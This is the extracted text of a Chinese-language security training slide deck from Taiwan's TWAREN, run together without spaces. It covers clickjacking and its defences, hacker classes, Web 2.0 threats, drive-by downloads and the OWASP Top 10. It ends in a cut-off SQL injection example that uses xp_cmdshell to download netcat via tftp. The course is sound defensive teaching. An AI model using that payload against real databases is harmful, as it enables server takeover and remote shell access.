98年度TWAREN教育訓練駭客入侵手法大剖析-網站攻防實務夏克強麟瑞科技技術顧問CCNA,CCDA,CCNP,CQSBS7799LeadAuditor,CEH,OCA,OCPAgenda新型的Clickjacking攻擊Web2.0的網頁攻擊與防禦ThreatsthatWeb2.0bringsandsecurityissuesOWASPTOP10VulnerabilitiesInjectionFlawandXSSAttacksDemoandmoreCountermeasurestoProtectagainstAttacks課前須知依據電腦處理個人資料保護法,入侵他人系統以竊取機密或竄改、偽造電子資訊將可能構成犯罪行為電磁記錄可當訴訟證據請使用自己的電腦使用虛擬機進行測試News–Twitter網站被17歲少年入侵其他新聞clickjacking是攻擊者試圖綁架使用者的滑鼠點擊,讓使用者在不知情的情況下點擊攻擊者精心設計的連結或按鈕clickjacking可視為是一種進階的網路釣魚手法clickjacking與CSRF相似,都是讓使用者在不自覺的狀況上當Clickjacking(點擊綁架)Clickjacking範例1與CSRF類似Clickjacking範例1–使用者看到的webpageClickjacking範例1–實際的webpageClickjacking範例2Clickjacking範例2-實際的webpageClickjacking範例2–WebcamClickjackingClickjacking範例3瀏覽器要上修補程式,但仍有瀏覽器沒有修補程式使用Firefox的Noscript的ClearClick功能阻擋iframe的執行(NoScript)或停用JavascriptFramebustingforyourownsitesscriptif(top!=self)top.location=location/scriptIE8针對Clickjacking增加對Clickjacking攻擊的防禦功能X-FRAME-OPTIONS:DENYX-FRAME-OPTIONS:SAMEORIGINClickjacking防禦使用虛擬機上網使用網站信譽軟體如:McAfeeSiteAdvisor用右鍵copy連結上網clickjacking招數多防不勝防:一般使用者哪懂這麼多呀?我暈~Clickjacking防禦2Clickjacking防禦–Clickjacking警告視窗Agenda新型的Clickjacking攻擊Web2.0的網頁攻擊與防禦ThreatsthatWeb2.0bringsandsecurityissuesOWASPTOP10VulnerabilitiesInjectionFlawandXSSAttacksDemoandmoreCountermeasurestoProtectagainstAttacksCanHackingBeEthical?Theverb‘hacking’describestherapiddevelopmentofnewprogramsorthereverseengineeringofalreadyexistingsoftwaretomakethecodebetter,andefficient.(RFC1983,InternetUsers'Glossary)Thenoun‘hacker’referstoapersonwhoenjoyslearningthedetailsofcomputersystemsandstretchtheircapabilities.Theterm‘cracker’referstoapersonwhouseshishackingskillsforoffensivepurposes.Theterm‘ethicalhacker’referstosecurityprofessionalswhoapplytheirhackingskillsfordefensivepurposes.HackerClassesBlackhats•Individualswithextraordinarycomputingskills,resortingtomaliciousordestructiveactivities.Alsoknownas‘Crackers.’WhiteHats•Individualsprofessinghackerskillsandusingthemfordefensivepurposes.Alsoknownas‘SecurityAnalysts’.GrayHats•Individualswhoworkbothoffensivelyanddefensivelyatvarioustimes.EthicalHackerClasses•FormerBlackHats•WhiteHatsHackerSkills•Professional(beabletodevelopexploittoolsandfindvulnerabilities•Experienced(withknowledgeofsecurityandhackingtechnology)•ScriptKidde中國網軍Whatdoesamalicioushackerdo?22/13Web1.0vs.Web2.0Web1.0Web2.0DoubleClick--GoogleAdSense是一個快速簡便的方法,可以讓各種規模的網站出版者為他們的網站展示與網站內容相關的Google廣告並獲取收入。Ofoto--Flickr使用者除了可透過Tags分享照片,Flickr?也提供連絡人機制(Contacts?),使用者可看到對方最新的照片,以及快速瀏覽該連絡人的公開相片。publishing--participationmp3.com--Napster是一種線上音樂服務,最初由ShawnFanning創建的檔案分享服務。Napster是第一個被廣泛應用的點對點(Peer-to-Peer,P2P)音樂共享服務。BritannicaOnline--Wikipedia自由的百科全書,可以由用戶編輯。personalwebsites--Blogging,Twitter,SplurkWeblog指的是以網頁作為呈現媒介的個人日記,也有人把它稱做網頁型態的日記。1999年PeterMerholz開始把將weblog唸成WeBlog,因而有了Blog這個說法。Web2.0就是新一代的網路服務,是雙向互動。其重要精神在於使用者的參與。Web2.0這個概念由O'Reilly媒體公司創辦人暨執行長TimO'Reilly(提姆•奧萊理)所提出邁向eGov2.0優質網路政府Web2.0SecurityIssuesP2P的危害如果是以簡易方式「身分證字號+戶號」申報,問題就比較大,納稅人若是把申報資料存在硬碟裡,就很可能因為裝了FOXY軟體,讓自己的個資與他人『分享』。新的威脅-Spyware爆炸性成長根據AOL/NCSA(AmericaOnlineandtheNationalCyberSecurityAlliance)的研究,已有80%的家用電腦上被安裝了間諜軟體。IDC2004年針對北美地區600個企業所進行的資安調查結果發現,估計超過67%的電腦受到間諜程式的危害。2005年5月24日IDC於公佈一份「間諜程式威脅白皮書」,顯示間諜軟體防護產品市場在2004年呈現爆炸性成長,成長幅度高達283%,並且間諜軟體迅速攀升成為網路安全的第四大威脅。Spyware是被忽略資安危機重要資料外洩事件頻傳,令人鼻酸!Orz…中共駭客木馬入侵外交部:哪有那麼容易被竊資料!!漢光22號演習演習,駭客看光光…老伯:AreYouSure!?你一定沒上夏老師的黑站密技課程喔!?網頁掛馬2007.06.06媒體報導–Google最新統計,目前全台有九百八十四個網站被植入惡意程式碼,其中不乏知名的台灣奧迪汽車、ESPNSTAR體育台和眾多學術機構或商業網站。陳冠希事件這些網站含有「隱匿強迫下載」惡意程式,網友看文章、欣賞照片時,不知不覺被安裝木馬、後門程式、間諜軟體或其他病毒軟體,電腦無故當機只是小case,嚴重時會竊取電腦中個人資料,曾在網路銀行輸入的帳號密碼,也可能被側錄。Drive-byDownload-EmbeddedDrive-byDownload–ExternalLinksDrive-byDownload-hybrid學校研究單位政府便民網站郵局,電子商務金融證券相關行業線上購物業電信業醫院,交通•線上付費•線上訂購服務•訂票•校務系統•選課系統•電子銀行系統•金融網•線上下單•線上購書•線上購物•個人資料•稅務•地政•交通PCIDSSISO27001個資法RegulatoryComplianceWhyWebapplicationVulnerableImprovedcommercialorin-houseapplicationaccesstoinformationmeansimprovedaccessforhackers?MoreandMoreHackingToolsTraditionalWebApplicationStructureOWASPTop10List2007A1CrossSiteScripting(XSS)A2InjectionFlaws(SQLInjection,commandinjection)A3MaliciousFileExecutionA4InsecureDirectObjectReference(BrokenAcceesControlin2006)A5CrossSiteRequestForgery(CSRF)(akaSessionRidingorOne-ClickAttack)A6InformationLeakageandImproperErrorHandlingA7BrokenAuthenticationandSessionManagementA8InsecureCryptographicStorageA9InsecureCommunication(InsecureConfigurationManagementin2006)A10FailuretoRestrictURLAccessOWASPGuideOWASPestimatesmorethan300securityissuesrelatedtocodingcouldimpactwebapplications—Comprehensive,LightweightApplicationSecurityProcessOWASPCodeReviewGuideSQLInjection3AttackersendsdatacontainingSQLfragmentsAttackerentersSQLfragmentsintoawebpagethatusesinputinaquery1AttackerviewsunauthorizeddataCustomCodeAccountsFinanceAdministrationTransactionsCommunicationKnowledgeMgmtE-CommerceBus.FunctionsDatabase2Applicationsendsmodifiedquerytodatabase,whichexecutesitSQLInjectionSQLInjectionSQLInjectionexample:‘;execmaster..xp_cmdshell‘tftp–i127.0.0.1GETnc.exec:\windows\system32\nc.exe’--‘;execmaster..xp_cmdshell‘